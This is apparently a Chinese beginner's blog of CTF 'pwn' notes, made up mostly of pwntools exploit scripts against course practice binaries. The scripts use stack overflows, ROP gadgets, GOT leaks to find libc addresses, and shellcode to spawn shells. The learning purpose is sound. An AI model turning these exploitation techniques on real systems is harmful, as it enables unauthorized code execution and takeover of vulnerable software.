PWN入门

PWN入门

拖了好久。。。
汇编底子不是很好。。。
做逆向也有一段时间了
对操作系统也有大概了解了
现在才敢尝试一下。。。
https://www.bilibili.com/video/BV1854y1y7Ro
经大佬推荐 看这个课入的门
因此本文所有题都是跟课程一致
但exp不同，我写exp的原则是少用“魔法值”

魔法值 （会根据我看课的进度进行更新

0.0xdeadbeef 垃圾数据 避免0x00被某种原因截断
尽量不要用0x00
1.gadget 给寄存器赋值或栈平衡…

ret2libc1

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

from pwn import *

context.log_level = 'debug'
context.arch = 'i386'

elf = ELF('./ret2libc1')

binsh = next(elf.search(b"/bin/sh"))
system = elf.symbols['system']

payload = b"A"*112 + p32(system) + p32(0) + p32(binsh)

io = process('./ret2libc1')
io.sendline(payload)

io.interactive()

ret2shellcode

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

from pwn import *

context.log_level = 'debug'
context.arch = 'i386'


elf = ELF('./ret2shellcode')
#这里为什么+0x40 去ida看看就知道了
#bss = elf.bss() + 0x40
bss = elf.symbols['buf2']

io = process('./ret2shellcode')

shellcode = asm(shellcraft.sh())
io.recvuntil(b'!!!')
#payload = shellcode.ljust(112, b'\x00') + p32(bss)
payload = shellcode + b'\x00'*(112-len(shellcode)) + p32(bss)
io.sendline(payload)

io.interactive()

ret2syscall

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

from pwn import *

context.log_level = 'debug'
context.arch = 'i386'
# context.terminal = ['tmux', 'splitw', '-h']

elf = ELF('./ret2syscall')

pop_eax_ret = 0x080bb196
pop_edx_ecx_ebx_ret = 0x0806eb90
int_0x80 = 0x08049421
binsh = next(elf.search(b"/bin/sh"))

io = process('./ret2syscall')

payload = p32(pop_eax_ret) + p32(0xb) + p32(pop_edx_ecx_ebx_ret) + p32(0) + p32(0) + p32(binsh) + p32(int_0x80)
payload = b"A"*112 + payload

io.sendline(payload)

io.interactive()

ret2libc2

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

from pwn import *

context.log_level = 'debug'
context.arch = 'i386'
context.terminal = ['tmux', 'splitw', '-h']

elf = ELF('./ret2libc2')

# bss = elf.bss() + 0x40
buf2 = elf.symbols['buf2']
gets = elf.symbols['gets']
system = elf.symbols['system']


binsh = b"/bin/sh\x00"

payload = b"A"*112

# pop_ebx_ret = 0x0804843d
# payload += p32(gets)
# payload += p32(pop_ebx_ret)
# payload += p32(buf2)

# payload += p32(system)
# payload += p32(0)
# payload += p32(buf2)
#============================
payload += p32(gets)
payload += p32(system)
payload += p32(buf2)
payload += p32(buf2)

io = process('./ret2libc2')

io.sendline(payload)
# gdb.attach(io)
# pause()
io.sendline(binsh)

io.interactive()

ret2libc3

注意
io.sendline(str(elf.got['puts']).encode())
这里不能去用symbols
原因symbols找到的是plt地址
got才是got地址

只能填充deadbeef 因此由strcpy造成的溢出不要有0x00

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

from pwn import *

context.log_level = 'debug'
context.arch = 'i386'
# context.terminal = ['tmux', 'splitw', '-h']

elf = ELF('./ret2libc3')
so = ELF('./libc-2.27.so')
print(elf.got['puts'])
io = process(['./ld-2.27.so','./ret2libc3'], env={"LD_PRELOAD":"./libc-2.27.so"})
io.recv()

io.sendline(str(elf.got['puts']).encode())
io.recvuntil(b": ")
io_puts = io.recvuntil(b'\n', drop=True)
io_puts = int(io_puts[2:], 16)

libc_base = io_puts - so.symbols['puts']

system = libc_base + so.symbols[b'system']
binsh = libc_base + next(so.search(b"/bin/sh\x00"))

payload = b"A"*60 + p32(system) + p32(0xdeadbeef) + p32(binsh)

io.sendlineafter(b':', payload)

io.interactive()

pwn0

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

from pwn import *

context.log_level = 'debug'

elf = ELF('./level0')
callsys_addr = elf.symbols['callsystem']
ret = 0x0000000000400431

io = process('./level0')
io.recvuntil(b'World\n')

payload = b'A' * 0x88 +p64(ret) + p64(callsys_addr)
# payload = b'A' * 0x88 + p64(callsys_addr) 
# Ubuntu18 x64的环境 需要栈平衡因此需要gadget
io.send(payload)

io.interactive()

pwn1

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

from pwn import *

context.log_level = 'debug'
context.arch = 'i386'

shellcode = asm(shellcraft.sh())
io = process('./level1')

buf_addr = int(io.recvline()[14: -2], 16)

payload = shellcode + b'\x00' * (0x88 + 0x4 - len(shellcode)) + p32(buf_addr)
io.send(payload)
io.interactive()

pwn2

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

from pwn import *

context.log_level = 'debug'
context.arch = 'i386'

elf = ELF('./level2')
system = elf.symbols['system']
binsh = next(elf.search(b'/bin/sh'))

payload = b'a' * (0x88 + 0x4) + p32(system) + p32(0xdeadbeef) + p32(binsh)

io = process('./level2')
io.sendlineafter(b"Input:\n", payload)

io.interactive()

pwn2_x64

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

from pwn import *

context.log_level = 'debug'
context.arch = 'amd64'

#64位参数顺序 rdi rsi rdx rcx r8 r9 其余参数从右往左压栈

elf = ELF("./level2_x64")
binsh = next(elf.search(b"/bin/sh\x00"))
system = elf.symbols["system"]
pop_rdi_ret = 0x00000000004006b3
ret = 0x00000000004004a1

io = process("./level2_x64")
io.recvline()
payload=b'A'*0x80 + b"A"*8 + p64(ret) + p64(pop_rdi_ret) + p64(binsh) + p64(system)
io.send(payload)
io.interactive()

pwn3

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

from pwn import *

context.log_level = 'debug'
context.arch = 'i386'

io = process("./level3")
libc = ELF("/lib/i386-linux-gnu/libc.so.6")
elf=ELF('./level3')

vulfun_addr=elf.symbols['vulnerable_function']
write_plt=elf.symbols['write'] 
write_got=elf.got['write'] 

# 相当于调用write(1,write_got,4) 把write_got的值写到标准输出 最后再调用vulfun
# 其中 p32(write_plt)+p32(0xdeadbeef) 现在换成vulfun_addr 为了再次调用vulfun
payload1=b'A'*(0x88+4)+p32(write_plt)+p32(vulfun_addr)+p32(1)+p32(write_got)+p32(4)

io.recvuntil(b"Input:\n")
io.sendline(payload1)

write_addr=u32(io.recv()[:4])

libc_write=libc.symbols['write']
libc_base = write_addr - libc_write

system=libc_base+libc.symbols['system'] 
binsh=libc_base+next(libc.search(b'/bin/sh'))

#第二次栈溢出
payload2=b'A'*(0x88+4)+p32(system)+p32(0xdeadbeef)+p32(binsh)

io.sendline(payload2)

io.interactive()

pwn3_x64

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

from pwn import *

context.log_level = 'debug'
context.arch = 'amd64'

io = process("./level3_x64")
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
elf=ELF('./level3_x64')

vulfun_addr=elf.symbols['vulnerable_function']
write_plt=elf.symbols['write'] 
write_got=elf.got['write'] 

# 64位参数顺序 rdi rsi rdx rcx r8 r9 其余参数从右往左压栈
pop_rdi_ret = 0x00000000004006b3
pop_rsi_r15_ret = 0x00000000004006b1
ret = 0x0000000000400499

#没有考虑pop rdx 是因为没有 gdb能看到 rdx的值为200 够用了
payload1 = b'A'*(0x80+8) + p64(pop_rdi_ret) + p64(1) + p64(pop_rsi_r15_ret) + p64(write_got) + p64(0) + p64(write_plt) + p64(vulfun_addr)

io.recvuntil(b"Input:\n")
io.sendline(payload1)

write_addr=u64(io.recv()[:8])

libc_write=libc.symbols['write']
libc_base = write_addr - libc_write

system=libc_base+libc.symbols['system'] 
binsh=libc_base+next(libc.search(b'/bin/sh'))

#第二次栈溢出
payload2=b'A'*(0x80+8)+p64(pop_rdi_ret)+p64(binsh)+p64(system)

io.sendline(payload2)

io.interactive()